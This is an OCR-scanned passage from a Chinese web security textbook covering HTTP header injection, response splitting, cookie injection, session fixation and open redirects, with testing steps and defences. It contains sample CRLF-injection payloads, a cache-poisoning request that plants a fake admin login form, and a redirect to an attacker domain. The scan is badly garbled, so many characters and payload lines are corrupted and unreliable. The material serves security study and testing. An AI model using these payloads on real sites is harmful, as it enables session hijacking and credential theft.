的 任何 漏洞 ， 也 无 法 进行 有 效 防御 。 此 外 ， 它 还 是 一 种 有 用 的 攻击 技 
巧 。 测 试 员 也 可 以 通过 它 来 了 解 如 何在 非常 规 情 况 下 应 用 同 源 策略 。 


13.4 WEA 


到 现在 为 止 ， 我 们 介绍 的 许多 攻击 主要 与 利用 某 种 应 用 程序 功能 
向 应 用 程序 啊 应 中 注入 专门 设计 的 内 容 有 关 。 这 其 中 最 主要 的 攻击 为 
XSS 攻 击 。 我 们 还 介绍 了 通过 注入 的 HIML 和 CSS 代 码 跨 域 捕 获 数 据 的 
技巧 。 在 这 一 节 中 ， 我 们 将 介绍 其 他 一 些 客户 端 注入 攻击 。 


13.4.1 HTTP 消 息 头 注入 


如 采用 户 控制 的 数据 以 不 安全 的 方式 插入 到 应 用 程序 返回 的 HTTP 
消 思 头 中 ， 这 时 吏 会 出 现 HTTP 请 息 头 注入 漏洞 。 如 采 攻 击 者 能 够 在 他 
控制 的 消息 头 中 注入 换行 特 ， 他 束 能 在 啊 应 中 搬入 其 他 HTTP 消 筷 尖 、 
并 在 啊 应 主体 中 写 入 任意 内 容 。 

这 种 漏洞 最 常见 于 Location 与 Set-Cookie 消 息 头 中 ， 但 也 会 出 现在 
其 他 HTTP 消 息 关 中。 前 文 已 经 讲 到 ， 应 用 程序 提取 用 户 提交 的 输入 ， 
并 将 它 插入 到 响应 码 为 3xx 的 Location 消 息 头 中 。 同 样 ， 一 些 应 用 程序 
提取 用 户 提交 的 输入 ， 并 将 其 插入 cookie 值 中 。 例 如 : 


GET /settings/12/Default.aspx?Language=English HTTP/1.1 


Host: mdsec.net 


HTTP/1.1 200 OK 
Set-Cookie: PreferredLanguage=English 


在 上 述 任何 一 种 情况 下 ， 攻 击 者 都 可 以 使 用 回 车 符 (0x0d) 或 换 
行 符 (0x0a) 构造 一 个 专门 设计 的 请 求 ， 在 他 们 控制 的 消息 头 中 注入 
一 个 换行 符 ， 从 而 在 下 面 的 行 中 注入 其 他 数据 。 例 如 : 


GET /settings/12/Default.aspx?Language-Englisht0d%0aFoo:+bar HTTP/1. 


Host: mdsec.net 
HT'TP/1.1 200 OK 


Set-Cookie: PreferredLanguage=English 
Foo: bar 


1. 利用 消息 头 注入 漏洞 


查找 消 筷 关注 入 漏洞 的 方法 与 查找 XSS 漏 洞 的 方法 类 似 ， 同 样 需 
要 寻找 用 户 控 制 的 输入 重复 出 现在 应 用 程序 返回 的 HTTP 消 恩 尖 中 的 情 
况 。 因 此 ， 在 探查 应 用 程序 是 否 存在 XSS 漏 洞 的 过 程 中 ， 还 应 当 确定 
应 用 程序 可 能 易于 受到 消息 头 注 入 的 全 部 位 置 。 


渗透 测试 步骤 


(1) 在 用 户 控 制 的 输入 被 复制 到 HTTP 消 息 头 中 的 每 个 位 置 都 
可 能 存在 漏洞 ， 确 认 应 用 程序 是 否 接受 URL 编 码 的 回 车 符 (%0d) 
FRITH (%0a) ， 以 及 它们 是 否 按 原样 在 响应 中 返回 。 

(2) 注意 ， 是 在 服务 器 的 响应 中 而 不 是 换行 符 的 URL 编 码 形 
式 中 寻找 换行 符 本 村。 如 果 通 过 拦截 代理 服务 器 得 看 啊 应 ， 攻 击 成 
功 的 话 ， 应 该 会 在 HITP 消 息 头 中 看 到 另外 一 个 新 行 。 

(3) 如 果 服 务 器 的 响应 中 仅 返 回 两 个 换行 符 中 的 一 个 ， 根 据 
实际 情况 ， 仍 然 能 够 设计 出 有 效 的 攻击 方法 。 

(4) 如 果 发 现 换行 符 被 应 用 程序 阻止 或 净化 ， 那 么 应 该 党 试 
以 下 攻击 方法 : 

foo%00%0d%0abar 


£foo0%250d%250abar 
fooss0d0dsts0a0abar 


人 人 警告 有 时 ， 由 于 过 分 依赖 HTML 源 代码 或 浏览 器 插件 


提供 的 信息 〈 其 中 并 不 显示 响应 消息 头 ) ， 上 述 问 题 可 能 会 被 名 
略 。 因 此 ， 应 确保 使 用 拦截 代理 服务 占 工 具 读 取 HTTP 员 应 消 旦 
头 。 


如 果 能 够 在 啊 应 中 注入 任意 消 轧 头 和 消 轧 主体 内 容 ， 那 么 这 种 行 
为 可 通过 各 种 方式 攻击 应 用 程序 的 其 他 用 户 。 


尝试 访问 


http://mdsec.net/settings/12/ 
http://mdsec.net/settings/3 1/ 


@ 注入 cookie 
攻击 者 可 以 建立 一 个 URL， 在 请 求 它 的 任何 用 户 的 浏 贤 妖 中 设 定 
任意 cooike。 例 如 : 


Ot oe- T9372/Desadl =. aspx? Language-ling! i shedakzdases— 
Coouokie:+2ess_0E3d21al2298898; .Lt .2 


Hess: Nasec.nes. 


a 299 OK 
Se.-Cookle: Srelerres Lang wage-Eng_ ish 


Se.-Cookle: Sessié-LZ0alZc7eSeos; 


如 果 进 行 适当 配置 ， 这 些 cookie 可 以 访问 不 同 的 浏览 器 会 话 。 这 
时 ， 通 过 前 面 利 用 反射 型 XSS 漏 洞 时 使 用 的 相同 传送 机 制 (电子 邮 
件 、 第 三 方 Web 站 点 等 ) ， 就 可 以 诱 使 目标 用 户 访问 恶意 URL © 

@ 传送 其 他 攻击 

因为 HTTP 消 息 头 注入 允许 攻击 者 控制 整个 啊 应 主体 ， 所 以 几乎 任 
何 针 对 其 他 用 户 的 攻击 都 可 以 使 用 它 作 为 传送 机 制 ， 包 括 虚 拟 Web 站 
点 置换 、 脚 本 注入 、 任 意 重 定向 、 针 对 ActiveX 控 件 的 攻击 等 。 

@ HTTP 响应 分 割 

这 是 一 种 试图 通过 恶意 内 容 “ 毒 害 ” 代 理 服务 需 缓 存 ， 从 而 攻破 通 
过 代理 服务 器 访问 应 用 程序 的 其 他 用 户 的 攻击 技巧 。 例 如 ， 如 果 企 业 
网 络 中 的 所 有 用 户 通 过 缓存 代理 服务 器 访问 某 个 应 用 程序 ， 那 么 ， 通 
过 在 代理 服务 器 的 缓存 中 注入 恶意 内 容 (显示 给 任何 请 求 受 影响 页 面 
的 用 户 ) ， 攻 击 者 就 可 以 向 这 些 用 户 实 施 攻击 。 
攻击 者 可 以 按 以 下 步骤 ， 利 用 消息 头 注 入 漏洞 来 实施 响应 分 割 攻 


(1) 攻击 者 在 代理 服务 器 缓存 中 选择 一 个 他 希望 < 毒害 ”的 应 用 程 
序 页 面 。 例 如 ， 他 可 能 会 用 一 个 木马 登录 表单 (用 于 癌 攻 击 者 的 服务 
器 提交 用 户 证 书 ) 代替 /admin/ 处 的 页 面 。 

(2) 攻击 者 确定 某 个 消息 头 注入 漏洞， 构造 一 个 请 求 ， 在 服务 器 
啊 应 中 注入 一 个 完整 的 HTTP 主 体 以 及 另 一 组 啊 应 消息 头 和 另 一 个 啊 应 
主体 。 第 二 个 响应 主体 中 包含 他 的 木马 登录 表单 的 HTML 源 代码 。 这 
样 ， 服 务 絮 的 啊 应 看 起 来 束 像 是 两 个 连接 在 一 起 的 单独 HTTP 响 应 。 
此 ， 这 种 技巧 叫做 HTTP 啊 应 分 割 (HTTP response splitting) ， 因 为 攻 
击 者 已 经 把 服务 器 的 啊 应 “分 割 ?成 两 个 单独 的 啊 应 。 例 如 ; 


GET /settings/_2/Deftanlt.aspx?iangueqe=Englishtocetalentens Langta: 122 
SO0aAs0as0dsCa<html>s0dsOalcosCdetCla</html>tedtoackTor/* .14+200+O0K20dSoa 
Content-Length: +2397 S0Gs0as0dtda<htrl>soatNa<heac>s0dsCactitle> 
Adninistrator+Llogin</title>0dat0al...lorg URL...1] ITTP/1.1 


"BL: ese? neh 


"PT, 700 OK 
Set Cocxie: PreferredLanguags=srg-isk 


Center: Length: 22 


<html> 

fco 

</html> 

HTTP/1.1 200 OK 
Content-Length: 2307 


<html> 
<head> 


<title>Administrator login</title> 


(3) 攻击 者 与 代理 服务 器 建立 TCP 连 接 ， 传 送 这 个 专门 设计 的 请 
求 ， 后 面 紧 跟着 访问 被 “毒害 ”的 页 面 的 请 求 。 在 HTTP 协 议 中 ， 以 这 种 
方式 连接 请 求 是 合法 的 。 


GET http://mdsec.net/settings/12/Default.aspx?Language=Englisht0d%t0a 
Content-Length: +22%0d%0as0d%la<html>s0ds0atoost0 dsl a</html>s0acs0aHTTP/ 
1.1+200+OR*0d¢0aContent-Length: +2307%0dt0at0dt0a<html>t0atla<head>t0dt0a 
<title>Administrator+login</title>Od@0a[...long URL...] HITP/1.1 

Host: mdsec.net 


Proxy-Connection: Keep-alive 


(4) 代理 服务 器 与 应 用 程序 建立 TCP 连 接 ， 送 出 这 两 个 以 相同 方 
式 连 接 的 请 求 。 

(5) 应 用 程序 用 攻击 者 注入 的 HTTP 内 容 响 应 第 一 个 请 求 ， 它 看 
起 来 束 像 是 两 个 单独 的 HTTPH 响 应。 

(6) 代理 服务 器 收 到 这 两 个 看 似 单 独 的 响应 ， 并 认为 其 中 第 二 个 
响应 与 攻击 者 的 第 二 个 请 求 相对 应 ， 该 请 求 指 向 URL: 
http://mdsec.net/admin/。 代 理 服务 絮 把 第 二 个 啊 应 作为 这 个 URL 的 内 容 
保存 在 缓存 中 。 (如 果 代理 服务 器 已 经 在 缓存 中 保存 有 该 页 面 的 副 
本 ， 那 么 攻击 者 就 可 以 在 他 的 第 二 个 请 求 中 插入 一 个 适当 的 If- 
Modified-Since 消 忌 头 ， 并 在 注入 的 响应 中 插入 一 个 Last-Modified 消 息 
l 0 请 求 这 个 URL， 用 新 的 内 容 更 新 它 的 组 
子 O 

(7) 应 用 程序 发 布 它 对 攻击 者 的 第 二 个 请 求 的 响应 ， 其 中 包含 
URL http:/mdsec.neyadmin/ 的 真实 内 容 。 代 理 服务 器 并 不 认为 它 是 对 
它 发 布 的 请 求 的 啊 应 ， 因 而 抛弃 这 个 啊 应 。 

(8) 一 名 用 户 通过 代理 服务 器 访问 http://mdsec.net/ladmin/， 并 收 
到 这 个 URL 保 存在 代理 服务 颖 缓存 中 的 内 容 。 这 个 内 容 实 际 上 是 攻击 
者 的 木马 登录 表单 ， 因 此 用 户 的 证 书 被 攻破 。 

实施 这 种 攻击 的 步骤 如 图 13-3 所 示 “。 


GLI vhome.php?uid=123 


HUTPEL.| OK 


请 水 1 | vogqge0aContent-T.ength.. 


直行 级 在 
i-k? GFETiadmin pe i st IITTP/1.1 OK 


图 13-3 ”用 于 毒害 代理 服务 器 缓存 的 HITP 响 应 分 割 攻击 涉及 的 步骤 


i 请 六 1 的 响应 


2. 防止 消息 头 注入 漏洞 

要 防止 HITTP 消 息 头 注入 漏洞 ， 最 有 效 方法 是 杜绝 将 用 户 控制 的 输 
入 插入 到 应 用 程序 运 回 的 HTTP 消 恩 尖 中 。 如 我 们 在 介绍 任意 重 定 疝 漏 
洞 时 所 述 ， 通 弟 可 以 用 一 些 较 为 安全 的 方法 代 奉 这 种 行为 。 

如 条 不 可 避免 地 要 在 HTTP 消息 头 中 插入 用 户 控制 的 数据 ， 那 么 应 
用 程序 应 采取 以 下 双重 深层 防御 方法 防止 漏洞 产生 。 

口 输入 确认 。 应 用 程序 应 根据 情形 ， 对 插入 的 数据 进行 尽 可 能 户 
格 的 确认 。 例 如 ， 如 采 根 据 用 户 输 入 设 定 一 个 cookie 值 ， 那 么 应 将 这 
个 值 限制 为 仅 包含 子 母 字符 ， 最 大 长 度 为 6 字 廊 。 

口 输出 确认 。 应 对 插入 到 消 奶 关中 的 所 有 数据 进行 过 滤 ， 检 测 可 
能 的 恶意 字符 。 实 际 上 ， 任 何 ASCII 码 小 于 0x20 的 字符 都 应 被 视 为 可 
疑 的 恶意 字符 ， 应 用 程序 应 拒绝 包含 这 些 字符 的 请 求 。 

只 有 应 用 程序 在 其 SSL 终 止 符 后 未 使 用 绥 存 反 癌 代 理 服 务 器 ， 它 
才能 通过 对 所 有 应 用 程序 内 容 使 用 HTTPS， 防 止 攻击 者 利用 任何 残留 
的 消 忆 尖 注 入 漏洞 “毒害 ”代理 服务 器 绥 存 。 


13.4.2 ”cookie 注入 


在 cookie 攻 击 中 ， 攻 击 者 利用 应 用 程序 功能 或 浏览 辟 行 为 的 某 种 
特性 ， 在 受害 用 户 的 浏览 器 中 设置 cookie， 或 修改 该 cookie 。 
攻击 者 可 以 通过 各 种 方式 实施 cookie 注 入 攻击 。 
口 某 些 应 用 程序 的 功能 在 请 求 参数 中 使 用 一 个 名 称 和 值 ， 并 在 啊 
Y 的 cookie 中 设置 该 名 称 和 值 。 保 存 用 户 首选 项 大 多 属于 此 类 功能 。 
口 如 前 所 述 ， 如 果 存 在 HITP 消 息 头 注入 漏洞 ， 就 可 以 利用 此 漏 润 
注入 任意 Set-Cookie 消 息 头 。 
口 可 以 利用 相关 域 中 的 XSS 漏 洞 在 目标 域 上 设置 一 个 cookie。 目 标 
人 以 及 目标 域 的 父 域 及 其 子 域 ， 都 可 以 通过 这 种 方式 加 
以 利用 。 

口 可 以 利用 主动 中 间 人 攻击 (例如 ， 针 对 公共 无 线 网 络 中 的 用 
户 ) 在 任意 域 上 设置 cookie， 即 使 目标 应 用 程序 仅 使 用 HTTPS 并 且 将 
其 cookie 标 记 为 安全 。 我 们 将 在 本 章 后 面部 分 详细 介绍 这 种 攻击 。 

如 果 攻 击 者 可 以 设置 任意 cookie， 他 就 可 以 利用 该 cookie 以 各 种 方 
式 攻击 目标 用 户 : 

口 在 某 些 应 用 程序 中 ， 设 置 一 个 特殊 的 cookie 可 能 会 破坏 应 用 程 
序 的 逻辑 ， 给 用 户 造 成 不 利 影响 (例如 ，UseHttps=false) 。 


口 由 于 cookie 通 常 仅 由 应 用 程序 本 吴 设 置 ， 因 此 它们 会 受 客 户 端 
代码 信任 。 该 代码 可 能 会 以 各 种 危险 的 方式 (对 攻击 者 可 控制 的 数据 
而 言 ) 处 理 cookie 值 ， 导 致 基于 DOM 的 XSS 或 JavaScript 注 入 。 

口 除 将 反 CSRF 令 脾 与 用 户 会 话 关联 外 ， 一 些 应 用 程序 还 在 cookie 
和 请 求 参 数 中 放置 该 令 牌 ， 然 后 对 它们 的 值 进 行 比较 ， 以 防止 CSRF 攻 
击 。 如 采 攻 击 者 可 以 控制 cookie 和 参数 值 ， 残 能 够 避 开 这 种 防御 。 

口 如 本 章 前 面部 分 所 述 ， 攻 击 者 可 以 利用 某 个 永久 性 XSS 漏 洞 ， 
通过 针对 登录 功能 的 CSRF 攻 击 使 用 户 登 录 攻 击 者 的 账户 ， 并 因此 访问 
XSS 有 效 载 何 。 如 有 果 登 录 页 面 能 够 有 效 防范 CSRF， 这 种 攻击 将 无 法 奏 
效 。 但 是 ， 如 果 攻 击 者 能 够 在 用 户 的 浏览 絮 中 设置 任意 cookie， 他 就 
可 以 直接 疝 用 户 传送 自己 的 会 话 令 牌 ， 从 而 成 功 实施 攻击 ， 而 不 必 实 
施 针 对 登录 功能 的 CSRF 攻 击 。 

口 设置 任意 cookie 可 以 对 会 话 固定 漏洞 加 以 利用 (将 在 下 一 市 介 


定 
如 果 应 用 程序 在 用 户 首 次 访问 它 时 为 每 一 名 用 户 建立 一 个 匿名 会 
话 ， 这 时 往往 束 会 出 现 会 话 固 定 漏 润 。 如 采 应 用 程序 包含 登录 功能 ， 
这 个 匿名 会 话 将 在 用 户 登 录 前 创建 ， 然 后 ， 一 旦 用 户 登 录 ， 该 会 话 即 
升级 为 通过 验证 的 会 话 。 最 初 ， 会 话 令 牌 并 未 被 赋予 任何 访问 权限 ， 
但 当 用 户 通 过 验证 后 ， 这 个 令 牌 也 具有 了 该 用 户 的 访问 权限 。 

在 标准 的 会 话 劫持 攻击 中 ， 攻 击 者 必须 使 用 某 种 方法 截获 一 名 应 
用 程序 用 户 的 会 话 令 牌 。 另 一 方面 ， 在 会 话 固 定 攻击 中 ， 攻 击 者 首先 
从 应 用 程序 中 直接 获得 一 个 匿名 令 牌 ， 然 后 使 用 某 种 方法 将 这 个 令 
牌 < 固 定 ” 在 受害 者 的 浏览 硕 中 。 用 户 登 录 后 ， 攻 击 者 融 可 以 使 用 该 令 
牌 动 持 这 名 用 户 的 会 话 。 

成 功 实施 这 种 攻击 所 需 的 步 怠 如 图 13-4 所 示 。 
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图 13-4 ”实施 会 话 固定 攻击 所 需 的 步 又 


当然 ， 在 这 个 攻击 中 ， 最 关键 的 阶段 应 该 是 攻击 者 向 受害 者 传送 
他 获得 的 会 话 令 脾 ， 并 令 受 害 者 的 浏览 颖 使 用 这 个 令 牌 。 实 现 这 一 目 
标的 方法 因 传送 会 话 令 牌 所 采用 的 机 制 而 异 。 

口 如 末 使 用 HTTP cookie, EAA LAS EPA 
cookie 注 入 技巧 。 

口 如 果 在 URL 参 数 中 传送 会 话 令 牌 ， 则 攻击 者 只 需 回 受害 者 传递 
应 用 程序 向 其 发 布 的 同一 URL: 

https://wahh-app.com/iogin,.php?SessId=1l2dilalf8S6ef224ab424c2454208 

口 一 些 应 用 程序 服务 器 接受 在 URL 中 使 用 它们 以 分 号 分 隔 的 会 话 
令 牌 。 一 些 应 用 程序 默认 这 样 做 ， 而 其 他 应 用 程序 则 直接 以 这 种 方式 
使 用 令 牌 ， 即 使 这 并 非 服务 右 的 默认 行为 : 


http://wann-app.com/store/product.do;jsessionid-=-739105723F7AEE6ABC2 


13F8120184204.ASTPESD2 


口 如 末 应 用 程序 使 用 HTML 表 单 中 的 隐藏 字段 来 传送 会 话 令 牌 ， 
攻击 着 可 以 利用 CSRF 攻 击 在 用 户 的 浏览 郁 中 插入 他 的 令 牌 。 


并 不 提供 登录 机 制 的 应 用 程序 中 也 可 能 存在 会 话 固定 漏洞 。 例 
如 ， 某 应 用 程序 可 能 允许 匿名 用 户 浏 顺 产品 目 孙 、 在 购物 篮 中 添加 商 
品 、 通 过 提交 个 人 数据 与 文 付 细 和 进行 结算 ， 然 后 在 “确认 订单 ”页面 
上 审核 这 些 信息 。 在 这 种 情况 下 ， 攻 击 者 就 可 以 将 一 个 匿名 会 话 令 有 牌 
国定 到 受害 者 的 浏览 器 中 ， 等 待 该 用 户 提交 订单 并 输入 敏感 信息 ， 然 
后 使 用 该 令 牌 访问 “确认 订单 * 页 面 ， 截 获 该 用 户 的 信息 。 

一 些 Web 应 用 程序 与 Web 服 务 絮 接受 用 户 提 交 的 任意 令 和 脾 ， 即 使 
这 些 令 牌 并 不 是 由 服务 恬 在 此 前 发 布 的 。 如 果 收 到 一 个 不 被 认可 的 令 
有 牧 ， 服 务 絮 会 直接 为 这 个 令 牌 建立 一 个 新 会 话 ， 并 把 它 当 做 服务 器 生 
成 的 新 令 牌 处 理 。 过 去 ，Microsoft IIS 与 Allaire ColdFusion 服 务 器 都 存 
在 这 种 缺陷 。 

如 果 一 个 应 用 程序 或 服务 恬 以 这 种 方式 运作 ， 它 束 非 常 容 易 受 到 
会 话 固定 攻 击 ， 因 为 攻击 者 根本 不 必 采 取 任 何 措施 确保 固定 在 目标 用 
户 的 浏 贤 絮 中 的 令 脾 当前 有 效 。 攻 击 者 只 需 选 择 任 意 一 个 令 牌 ,将 其 
尽 可 能 广 地 进行 分 发 (例如 ， 通 过 电子 邮件 向 个 体 用 户 、 邮 件 列表 等 
发 送 一 个 包含 该 令 牌 的 URL) ， 然 后 定期 访问 应 用 程序 中 的 某 个 受 保 
护 页 面 (如 “用 户 资 料 ”) ， 检 查 受 害 者 何 时 使 用 这 个 令 牌 登录 。 即 使 
目标 用 户 几 个 月 都 没有 访问 这 个 URL， 但 蓄意 破坏 的 攻击 者 仍然 有 可 
能 动 持 该 用 户 的 会 话 。 

@ 查找 并 利用 会 话 固定 漏洞 

如 果 应 用 程序 文 持 身份 验证 ， 则 应 该 检查 它 如 何 处 理 与 登录 有 天 
的 会 话 令 牌 。 在 下 面 两 种 情况 下 ， 应 用 程序 可 能 易于 受到 攻击 。 

口 应 用 程序 回 每 名 未 通过 验证 的 用 户 发 布 一 个 匿名 会 话 令 有 牌 。 在 
用 户 登 录 后 ， 它 并 不 发 布 新 令 牌 ， 相 反 ， 他 们 现 有 的 会 话 被 升级 为 通 
过 验证 的 会 话 。 使 用 应 用 程序 服务 妮 的 默认 会 话 处 理 机 制 的 应 用 程序 
党 第 采用 这 种 行为 。 

口 应 用 程序 并 不 同 匿名 用 户 发 布 令 牌 ， 只 有 用 户 成 功 登 录 后 ， 应 
用 程序 才 癌 该 用 户 发 布 令 牌 。 但 是 ， 如 果 用 户 使 用 通过 验证 的 令 脾 访 
问 登 录 功 能 ， 并 使 用 不 同 的 证 书 登录 ， 则 应 用 程序 并 不 发 布 狐 令 有 牌 ; 
rs 与 之 前 通过 验证 的 会 话 关联 的 用 户 身 份 将 转换 为 第 二 名 用 户 的 

分 o 

在 这 两 种 情况 下 ， 攻 击 者 都 能 获得 有 效 令 牌 (通过 请 求 登录 页 面 
或 用 他 自己 的 证 书 登 录 ) ， 并 将 其 传送 给 目标 用 户 。 当 该 用 户 使 用 这 
个 令 牌 登录 时 ， 攻 击 者 驶 能 支持 这 名 用 户 的 会 话 。 


渗透 测试 步骤 


(1) 通过 任何 可 行 的 办 法 获得 一 个 有 效 令 牌 。 

(2) 访问 登录 表单 并 使 用 这 个 令 牌 登录 。 

(3) 如 果 登 录 成 功 ， 而 且 应 用 程序 并 不 发 布 新 令 牌 ， 则 表示 
它 易 于 受到 会 话 固定 攻击 。 


如 果 一 个 应 用 程序 并 不 支持 验证 ， 但 允许 用 户 提交 并 审查 敏感 信 

， 那 么 应 该 确认 用 户 在 提交 敏感 信息 前 后 是 否 使 用 相同 的 会 话 令 
7 如 果 令 牌 没有 发 生变 化 ， 则 攻击 者 就 可 以 获得 令 牌 并 将 其 传送 
， sane 是 交 敏 感 信息 后 ， 攻 击 者 束 可 以 使 用 该 令 脾 查看 这 
i 用 aR 3 


渗透 测试 步骤 


(1) 以 完全 匿名 的 用 户 身 份 获 得 一 个 会 话 令 牌 ,然后 完成 提 
交 敏 感 数据 的 过 程 ， 搂 下 来 继续 浏览 ， 直 到 任何 显示 敏感 数据 的 页 
面 。 


(2) 如 果 最 初 获得 的 同一 个 令 牌 现在 可 用 于 获取 敏感 数据 ， 
应 用 程序 就 易于 受到 会 话 国定 攻击 。 

(3) 如 果 已 经 发 现任 何 会 话 固定 漏洞 ， 则 应 确定 应 用 程序 是 
个 接受 它 之 前 并 未 发 布 的 任何 令 牌 。 如 有 条 接受 ， 那 么 在 很 长 一 段 时 
间 内 攻击 者 都 可 以 非常 轻松 地 利用 这 个 漏洞 。 


e 防止 会 话 固 定 漏 洞 

任何 时 候 ， 只 要 一 名 用 户 与 应 用 程序 的 交互 状态 由 匿名 转变 为 确 
认 ， 应 用 程序 吏 应 该 发 布 新 的 会 话 令 牌 。 这 不 仅 适 用 于 用 户 成 功 登 录 
的 情况 ， 而 且 适 用 于 匿名 用 户 首次 提交 个 人 或 其 他 敏感 信息 时 。 

为 进一步 防止 会 话 固定 攻击 ， 一 些 安全 性 至 关 重 要 的 应 用 程序 采 
用 每 页 面 令 牌 来 强化 主 会 话 令 牌 ， 以 提供 深层 防御 。 这 种 技巧 可 以 击 
退 大 多 数 会 话 动 持 攻击 ， 请 参阅 第 7 章 了 解 详情 。 

应 用 程序 不 得 接受 它 认 为 不 是 目 己 发 布 的 任意 会 话 令 牌 。 应 立即 
在 浏览 右 中 取消 该 令 牌 ， 并 将 用 户 返 回 到 应 用 程序 的 起 始 页 面 。 


如 果 应 用 程序 提取 用 户 可 控制 的 输入 ， 并 使 用 这 个 数据 执行 重 定 
品 ， 指 示 用 户 的 浏览 絮 访 问 不 同 于 用 户 所 请 求 的 URL， 这 时 束 会 导致 
开放 重 定 同 漏 润 。 相 比 于 可 执行 大 量 恶 意 控 作 的 跨 站 点 脚本 漏洞 ， 攻 
击 者 通常 对 这 些 漏洞 不 太 感 兴 趣 。 攻 击 者 主要 利用 开放 式 重 定 问 漏 洞 
实施 钓鱼 攻击 ， 诱 使 受害 者 访问 欺骗 性 Web 站 点 并 输入 敏感 信息 。 对 
潜在 的 受害 者 而 言 ， 重 定 回 漏洞 提高 了 攻击 者 的 可 信和 度 ， 因 为 它 允 许 
攻击 者 创建 一 个 指 回 他 所 针对 的 可 信 Web 站 点 的 URL， 因 此 更 具有 说 
服 力 Se 问 这 个 URL 的 用 户 将 被 悄悄 重 定 同 到 攻击 者 控制 的 
Webi H, ° 


也 就 是 说 ， 现 实 世界 中 的 大 多 数 钓 鱼 攻击 部 使 用 其 他 技巧 来 获得 
不 受 所 针对 的 应 用 程序 控制 的 可 信和 度 。 这 类 技巧 包括 注册 类 似 的 域 
名 、 使 用 官方 形式 的 子 域 ， 以 及 在 HTML 电 子 邮件 中 在 定位 文本 与 链 
接 的 目标 URL 之 间 造 成 不 匹配 。 研 究 表明 ， 多 数 用 户 都 无 法 或 不 太 可 
能 基于 URL 结 构 作出 安全 决策 。 因 此 ， 典 型 的 开放 式 重 定 疝 漏洞 对 钓 
鱼 攻击 者 而 言 并 无 多 大 价值 。 

近年 来 ， 开 放 式 重 定 回 漏洞 一 直 被 攻击 着 以 相对 民 性 的 方式 加 以 
利用 ， 用 于 实施 “ 瑞 克 播 授 ”(rickrolling) 攻击 。 在 这 种 攻击 中 ， 受 害 
者 在 不 知情 的 情况 下 被 重 定向 到 美国 流行 乐 传奇 人 物 里 元: 阿 斯 特 利 的 
视频 ， 如 图 13-5 所 示 。 
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图 13-5 “ 现 克 摇摆 ”攻击 的 结果 


1. 查找 并 利用 开放 式 重 定向 漏洞 


查找 重 定 同 漏洞 的 第 一 步 是 确定 应 用 程序 中 的 所 有 重 定向 。 应 用 
程序 可 以 通过 几 种 方式 使 用 户 的 浏览 恬 重 定 癌 到 不 同 的 URL。 

口 HTTP 重 定 癌 使 用 一 条 状态 码 为 3xx 的 消息 与 一 个 指定 重 定 问 日 
标的 Location 消 息 头 。 > 例如: 


HTTP/1.1 302 Object moved 
Location: http://mdsec.net/updates/update29.html 


J HTTP Refresh) E A 5) E [Al Ze AY Te] fs] Ba FE SER URL N 
载 某 个 页 面 ， 该 间隔 可 以 为 零 (0); , Eme ZB i A EE m o fh) 
如 : 


HTTP/1.1 200 OK 
Refresh: 0; url=http://mdsec.net/updates/update29-.html 


口 HTML<meta> 标 签 可 复制 任何 HTTP 消 息 头 的 行为 ， 因 此 可 用 于 
建立 重 定向 。 例 如 : 


HTTP/1.1 200 OK 
Content-Length: 125 


<html> 

<head> 

<meta http-equiv="refresh" content= 
"O;url=http://mdsec.net/updates/update29.html"> 
</head> 


</html> 


g JavaScript PHY FHA PI A A Ft at SE |) I HESRURL fii 
如 : 


HTTP/1.1 200 OK 
Content-Length: 1290 


<html> 

<head> 

<script> 

document .location="http://mdsec.net/updates/update29. html"; 
</script> 

</head> 

</html> 


以 上 这 些 方法 可 用 于 指定 绝对 或 相对 URL 。 


渗透 测试 步骤 


(1) 确定 应 用 程序 中 使 用 重 定向 的 所 有 位 置 。 
(2) 要 确定 所 有 重 定向 ， 一 个 有 效 的 方法 ， 是 使 用 拦截 代理 


服务 器 浏览 应 用 程序 ， 并 监控 访问 页 面 的 请 求 (与 其 他 资源 ， 如 图 
像 、 样 式 表 、 脚 本 文件 等 不 同 ) 。 

(3) 如 果 一 个 导航 操作 导致 了 几 个 连续 请 求 ， 应 分 析 它 使 用 
什么 方法 进行 重 定 向 。 


绝 大 多 数 的 重 定 癌 都 不 受用 户 控 制 。 例 如 ， 在 典型 的 登录 机 制 
中 ， 癌 /login.jsp 提 交 有 效 的 证 书 将 返回 一 个 指 问 /myhome.jsp 的 HTTP 重 
重 定向 的 目标 始终 相同 ， 因 此 不 会 受到 任何 重 定 同 漏洞 

EH] 。 

但 是 ， 在 有 些 情 况 下 ， 用 户 提交 的 数据 以 某 种 方式 用 于 设置 重 定 
回 的 目标 。 一 个 常见 的 例子 是 ， 应 用 程序 强制 使 会 话 已 经 终止 的 用 户 
返回 登录 页 面 ， 然 后 在 用 户 重新 成 功 通过 验证 后 将 他 们 重 定 同 到 最 初 
的 URL。 如 宁 遇 到 这 种 行为 ， 残 表明 应 用 程序 可 能 易于 受到 重 定 向 攻 
因此 ， 应 当 对 这 种 行为 进行 深入 分 析 ， 以 确定 它 是 否 可 被 攻击 者 

| 用 。 


渗透 测试 步骤 


(1) 如 果 用 户 数据 在 包含 绝对 URI 的 重 定 向 中 进行 处 理 ， 则 
应 修改 DRL 中 的 域名 ， 并 测试 应 用 程序 是 否 将 用 户 重 定向 到 另 一 个 
(0) 如 果 所 处 理 的 用 户 数据 包含 相对 URL， 应 将 此 URL 修 改 
为 指向 男 一 个 吉 的 绝对 URL， 并 测试 应 用 程序 是 否 和 用 户 重 定向 到 
这 个 域 。 

(3) 无 论 是 哪 一 种 情况 ， 如 果 见 到 以 下 行为 ， 那 么 应 用 程序 
肯定 容易 受到 重 定向 攻击 . 


GET /updates/8/?redir=http://mdattacker.net/ HTTP/1.1 


Host: mdsec.net 


HTTP/1.1 302 


Tacari ~ i . j f | 
,OCaTions: IIL p://N AC Lc er. 


尝试 访问 


http://mdsec.net/updates/8/ 

http://mdsec.net/updates/14/ 
http://mdsec.net/updates/18/ 
http://mdsec.net/updates/23/ 
http://mdsec.net/updates/48/ 


g 注解 ”如 果 应 用 程序 使 用 可 由 用 户 控制 的 数据 指定 框架 的 


目标 URL， 这 时 会 发 生 一 种 与 重 定 回 并 非 完全 相同 但 相似 现象 。 如 
果 可 以 构建 一 个 URL， 将 外 部 URL 的 内 容 加 载 到 子 框架 中 ， 就 可 以 
相当 隐秘 地 实施 重 定向 攻击 。 这 时 ， 可 以 使 用 其 他 内 容 仅 替换 应 用 
程序 的 部 分 界面 ， 并 使 浏览 万 地 址 栏 中 的 域 保 持 不 变 。 


以 下 情况 很 常见 : 用户 控 制 的 数据 用 于 设置 重 定 同 的 目标 ， 但 却 
被 应 用 程序 以 某 种 方式 过 滤 或 净化 挥 ， 以 阻止 重 定 同 攻击 。 这 时 并 没 
